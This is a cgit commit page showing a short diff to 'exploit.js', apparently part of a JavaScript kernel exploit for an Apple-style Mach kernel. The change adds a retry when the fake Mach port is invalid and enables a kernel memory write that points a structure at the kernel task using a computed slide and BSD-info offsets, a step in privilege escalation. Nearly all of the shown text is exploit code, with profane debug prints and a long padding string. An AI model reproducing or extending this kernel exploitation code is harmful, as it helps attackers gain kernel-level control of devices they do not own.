summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorspv420 <spv@spv.sh>2022-07-29 12:54:14 -0400
committerspv420 <spv@spv.sh>2022-07-29 12:54:14 -0400
commitafd32c3f9934e6425a77ed4b5a185b8fd6cb69a3 (patch)
tree78a68a8505bc2d22ae3db3ebeab9e3627765e44d
parent5ffc1a10b206f367c135330405833d7c59de56cb (diff)
aaaaaaaa
Diffstat
-rwxr-xr-xsrc/js/kexp/exploit.js10
1 files changed, 7 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e854ba0..fbca86c 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -496,7 +496,11 @@ again: while (true) {
*/
// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
- printf("%x\n", fake_port);
+ if (fake_port === 0 || fake_port === 0xffffffff) {
+ printf("fuck. fake port is fucked.\n");
+ continue again;
+ }
+ scall("printf", "%x\n", fake_port);
printf("fuck\n");
// todo: add mach_port_valid stuff
printf("fuck\n");
@@ -504,8 +508,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
-// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x73707621);
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:04:37 +0000